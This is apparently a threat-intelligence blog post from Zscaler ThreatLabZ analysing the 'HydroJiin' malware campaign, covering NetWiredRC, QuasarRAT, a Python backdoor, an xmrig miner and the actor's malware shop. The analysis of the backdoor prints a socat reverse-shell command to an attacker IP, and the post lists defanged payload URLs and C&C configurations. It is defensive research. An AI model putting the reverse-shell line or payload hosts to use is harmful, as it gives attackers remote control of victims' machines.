A look at HydroJiin campaign

Zscaler ThreatLabZ recently came across an interesting campaign involving multiple infostealer RAT families and miner malware. We’ve dubbed the campaign “HydroJiin” based on aliases used by the threat actor. The threat actor is in the business of selling malware, and lurks around in online forums that are common hangouts for neophyte to mid-level cyber criminals. We speculate that the malware author is running widespread campaigns involving different commodity and custom malware to steal information to sell in underground marketplaces.

Similar to other attacks outlined in the recent ThreatLabZ State of Encrypted Attacks report, this campaign serves as yet another example of the importance of continuous SSL inspection and zero trust policies to prevent initial compromise as well as communication back to C&C servers. While we do not know the impact of this particular campaign, this type of malware is for sale on underground markets to any number of prospective cybercriminals. While not highly sophisticated, this campaign uses a number of different techniques in order to increase chances of successfully infiltrating organizations who do not take proper precautions. 

This campaign utilizes a variety of payloads and infection vectors from commodity RATs to custom malware, email spam, backdooring/masquerading as cracked software, and other lures. Listed below are some of the unique aspects of this campaign:

• Multilevel infection chain of payloads leading from one to the next
• Custom python-based backdoor deployed along with other RATs (Netwired and Quasar)
• Python backdoor command checking for MacOS indicating possibility of more cross-platform functionality in the future. 
• Campaign is related to a threat actor who is also involved in distribution of multiple malicious tools via a dedicated malware e-commerce website
• Possibility of backdoored malware payload similar to CobianRAT case
• Not rare, but heavy use of pastebin to host encoded payloads

 

Infection chain

Figure 1: Infection Chain

The infection starts with the delivery of a downloader that downloads multiple payloads. We could not confirm the delivery vector of this downloader but in we suspect the use of spam emails and cracked software as we have seen in earlier campaigns. Once the attackers achieve initial compromise, the downloader downloads three files:

• Injector - Used as a loader to inject downloaded payloads into legitimate processes.
• Netwired RAT - A commodity RAT malware used to control the infected system and steal information.
• DownloaderShellcode - Obfuscated Meterpreter-based shellcode to download further payloads.
  •  A Pyrome python backdoor is downloaded by this shellcode. This will also download socat and xmrig miner, and finally xmrig miner downloads another RAT named Quasar.

Each payload and its functionality is explained below.

 

1 Analysis of downloader payload

First, the downloader downloads a payload from pastebin and saves to %TEMP% path, with randomly generated names. The payload hosted on pastebin is encoded in base64 with the text string reversed.

Figure 2: Downloading encoded payload from pastebin

 

The downloaded malware is an injector. It downloads two more payloads and passes an argument to the first payload for injection.

Figure 3: Passing payloads to injector

 

Payloads are then downloaded from:

• xmr-services[.]com/C/ABAGFBBEBDBCDBFCAEGBEEBAAB_B__DFECBAGGDEBEFD_EDCCBAEFEE.txt - Shellcode Downloader
• pastebin[.]com/raw/G0jcGs79 - NetwiredRC

The payloads are also similarly string reversed after base64 encoding.

 

1.1 NetWiredRC

The second payload in this case, hosted on pastebin, is a commodity malware known as NetWiredRC. NetWiredRC is a publicly available RAT sold by World Wired Labs, active since at least 2012. Adversaries often use spam mails and phishing emails to distribute NetWiredRC. In the wild, it has been seen that NetWireRC is also used by APT threat actors. Netwired’s main focus is to gain unauthorized control on the victim machine, steal stored credentials, and perform keylogging activity. This malware has had multiple version updates with bug fixes and new functionality. This sample will communicate with beltalus.ns1[.]name:8084 for further commands.

 

Configuration extracted from Netwire RAT::

{'Domains': ['beltalus.ns1[.]name:8084'], 'Proxy Server': 'Not Configured', 'Password': b'Volve', 'Host ID': b'Loader-%Rand%', 'Mutex': b'mKsWHTbK', 'Install Path': b'-', 'Startup Name': b'-', 'ActiveX Key': b'-', 'KeyLog Dir': b'%AppData%\\Logs_temp\\', 'Proxy Option': 'Direct connection', 'Copy executable': False, 'Delete original': False, 'Lock executable': False, 'Registry autorun': False, 'ActiveX autorun': False, 'Use a mutex': True, 'Offline keylogger': True}

 

1.2 Shellcode Downloader

The first of the two downloaded payloads is a Metasploit Shikata Ga Nai Encoder encoded shellcode capable of downloading another payload from: r3clama[.]com/files/chrome.exe. 

PDB path embedded inside binary: C:\local0\asf\release\build-2.2.14\support\Release\ab.pdb

 

The shellcode downloader downloads the following payloads:

• r3clama[.]com/files/socat.zip : Socat tool
• r3clama[.]com/files/services.exe : Miner Dropper

 

1.2.1 PyInstaller Payload

The payload downloaded from r3clama[.]com is a Python-based malware bundled using pyinstaller. Capabilities of this payload include:

• Persistence using Run key.
• Download, save and extract socat.zip from https://r3clama[.]com/files/socat.zip.
• Download monero miner exe from https://r3clama[.]com/files/services.exe which runs and further downloads QuasarRAT.
• Start network communication thread.

 

Figure 4 : Configuration settings of malware

 

Network Communication

The malware next communicates with C&C server at IP '193.218.118[.]190' and port 8266, first by sending a key to the server and then waiting for .json commands. Commands supported by this malware include:

• w0rm
• url
• upload

Figure 5 : Commands support by python backdoor

 

Command 'url' and 'upload'

Both url and upload commands are supported only for Windows OS—on any other platform these commands are ignored. Each of these commands is basically the same, and will download and save a payload from specified url. Files are saved under a newly created directory under %temp% with 16-character random names. There are only two differences:

1. In the case of upload, the downloaded file is saved at %temp%/upload and in case of url the file is saved at %temp%/userbin.
2. The url  command also executes the file in addition to downloading it while the upload command does not.

 

Command 'w0rm'

The w0rm command is supported on two platforms - Windows and MacOS. On receipt of this command, socat runs with following command line:

"socat OPENSSL:193[.]218[.]118[.]190:4442,verify=0 EXEC:{OS Command}"

 

OS Command

Windows : 'cmd.exe',pipes

MacOS : /bin/bash

And sends hostname+’$>’ back to C&C over socket.

In short, this command provides a reverse shell on the system to the attacker through socat. 

 

1.2.1.1 Socat

Socat is an advanced multipurpose data relay tool. It supports a plethora of protocols. Below is the description from its creators:

“socat is a relay for bidirectional data transfer between two independent data channels. Each of these data channels may be a file, pipe, device (serial line etc. or a pseudo terminal), a socket (UNIX, IP4, IP6 - raw, UDP, TCP), an SSL socket, proxy CONNECT connection, a file descriptor (stdin etc.), the GNU line editor (readline), a program, or a combination of two of these.  These modes include generation of "listening" sockets, named pipes, and pseudo terminals.”  -  README

 

1.2.1.2 Miner Dropper

This is again a .Net based malware. It includes a monero miner binary and all the dll dependencies required by a monero miner executable. It will drop and run the miner payload. Then, it downloads and runs an additional payload, again from pastebin.

 

Here is the Miner Dropper sequence:

Installs miner executable and dependency files.

Figure 6: Installing xmrig miner dependency files

 

Waits for idle before starting miner.

Figure 7: Checks if system is Idle before starting miner

 

CheckActive checks if the miner process is already running, if not then it is started by StartFiles.

Figure 8: Running miner executable with required arguments.

 

Downloads Quasar RAT payload from (https://pastebin[.]com/raw/khzLqKyN) after starting miner:

Figure 9: Downloading another payload(QuasarRAT)

 

This miner could be the MinerGate Silent Miner sold on the threat actor’s malware shop. If our assumption is true, there is another possibility of that miner being backdoored, similar to an old case of Cobian RAT, piggybacking on client malware operators to distribute his own RATs. Unfortunately, it is not possible to assert the assumption without access to the builder.

 

1.2.1.2.1 QuasarRAT

QuasarRAT has been active since at least 2015. Quasar is an open-source project written in .Net framework and freely available to the public. This means anyone can take the code and use it freely, with or without modification. Hence, this malware has become quite popular among cyber criminals. It has been used in various campaigns from mass spam campaigns to targeted attacks. The sample used in this campaign was version 1.3, which has been used in a number of past campaigns.

 

Configuration of QuasarRAT

Version: "1.3.0.0"

C&C : "beltalus.ns1[.]name:8082;"

Filename: "Client.exe"

Mutex: "QSR_MUTEX_NJPXiF1GKqO6Y3uwjn"

 

The C&C address used to control the Python backdoor and socat reverse shell is historically known to host C&C servers for many other malwares. Here is list of some malware and corresponding ports used to host C&C servers in the past:

 

 

Threat Actor HydroJiin

We believe this campaign is run by a threat actor known by the aliases ‘Hydro’ and ‘JiiN’. The threat actor is active on forums such as hackforums[.]net since 2010 and on YouTube at least since 2007. Initially the actor was involved with game mods and cracks, and eventually moved into malware space. We, with high confidence, believe that this actor is from a French-speaking region. 

By the other alias JiiN, the threat actor runs a malware shop called JiiN shop at “xmr-services[.]com”. Based on the two aliases, we are calling this campaign and actor HydroJiin. 

We are attributing this campaign to HydroJiin with high confidence due to following reasons:

• JiiN shop(Xmr-services) is used in this campaign.
• JiiN shop(Xmr-services) sells malware tools which Hydro makes videos about.
• This campaign downloads an encrypted payload from paste by user Hydro59.

All of the above indicates the relation between HydroJiin, this campaign, and xmr-services.

 

Malware Shop

The website called “JiiN shop” is based on the username of malware developer/seller and hosted at “xmr-services[.]com.” It is used to advertise and sell different malware products. The threat actor is using https://shoppy[.]gg for handling cryptocurrency payments. He is also selling some additional stuff on shoppy. 

 

Figure 10: JiiN Shop

 

Malware sold on this website includes:

• Minergate silent miner - A configurable miner tool to mine multiple cryptocurrencies on CPU or GPU hidden from the user. Comes with a builder with options for obfuscation, persistence, etc.
• Coak Crypter - As the name implies, a packer tool to obfuscate other malware to make them undetectable.
• NiiJ Stealer - A very basic stealer to steal passwords from popular tools like Firefox, Opera, Chrome, FileZilla, etc and send to the C&C panel.
• INK Exploit - Claims to make malware FUD, but provides no details about the specific exploit.

 

The Campaign 

The infection cycle and malware payloads discussed above are just a part of an ongoing campaign. The campaign has been going on since at least September 29th, 2020. The source website for this campaign is also serving other payloads which led us to more domains and payloads. Covering the whole campaign is out of scope for this blog post. But we are providing some details we have noticed. And a non-exhaustive list of malicious websites serving malwares, C&C domains is also included in the IoC section. 

Most of the domains as well as served file names follow a pattern. Domains are mostly registered using namecheap. 

Domain Pattern:

[a-z]{4,8}\d{2,4}[a-z]{0,2}.xyz

E.g

pzazmrserv194[.]xyz

mpzskdfadvert329[.]xyz

hklkxadvert475[.]xyz

Zgkstarserver17km[.]xyz
 

 

 

Conclusion

The threat actor HydroJiin has been in the malware business for some time now. He is selling multiple malware types along with running his own campaigns. The malware payload download stats from pastebin indicate he is having decent success. This actor might not be highly advanced but he is persistent in his efforts by using various tools, techniques, and methods to increase his chances of success. SSL inspection is advisable to detect and block such threats using SSL to hide their malicious intent. We at ZScaler ThreatLabZ continue to monitor, and strive to protect our customers from, all levels of threats. 

 

Detection

Figure 11: Zscaler Cloud sandbox report flagging malware 

 

In addition to sandbox detections, the Zscaler Cloud Security Platform detects indicators at various levels:

Win32.Backdoor.NetWiredRC

Win32.Downloader.NetWiredRC

Win32.Backdoor.QuasarRAT

Win32.Coinminer.Xmrig

Win32.Downloader.MiniInject

Win32.Downloader.Pyrome

 

MITRE ATT&CK

 

IOCs

 

 

 

C&C: